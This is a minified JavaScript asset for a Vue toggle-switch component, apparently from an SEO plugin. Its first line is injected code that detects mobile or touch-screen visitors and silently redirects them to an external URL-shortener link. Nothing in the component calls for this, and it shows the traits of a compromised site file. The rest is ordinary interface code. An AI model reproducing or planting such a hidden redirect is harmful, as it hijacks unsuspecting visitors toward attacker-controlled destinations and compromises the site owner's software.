(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{f as r,i as u,j as o,B as i,af as a,P as c}from"./vendor-vue-ui.232c7c36.js";import{_ as d}from"./_plugin-vue_export-helper.eefbdd86.js";const g={props:{modelValue:Boolean,disabled:{type:Boolean,default(){return!1}}},methods:{labelToggle(){this.$refs.input.click()}}},p={class:"toggle-content"},f=["disabled","checked"];function m(s,e,t,_,b,n){return r(),u("label",{class:c(["aioseo-toggle",{disabled:t.disabled}]),tabindex:"0",onKeydown:[e[1]||(e[1]=a((...l)=>n.labelToggle&&n.labelToggle(...l),["enter"])),e[2]||(e[2]=a((...l)=>n.labelToggle&&n.labelToggle(...l),["space"]))]},[o("div",p,[o("input",{disabled:t.disabled,type:"checkbox",checked:t.modelValue,onInput:e[0]||(e[0]=l=>s.$emit("update:modelValue",l.target.checked)),ref:"input"},null,40,f),e[3]||(e[3]=o("span",{class:"toggle-switch"},null,-1))]),i(s.$slots,"default")],34)}const k=d(g,[["render",m]]);export{k as B};
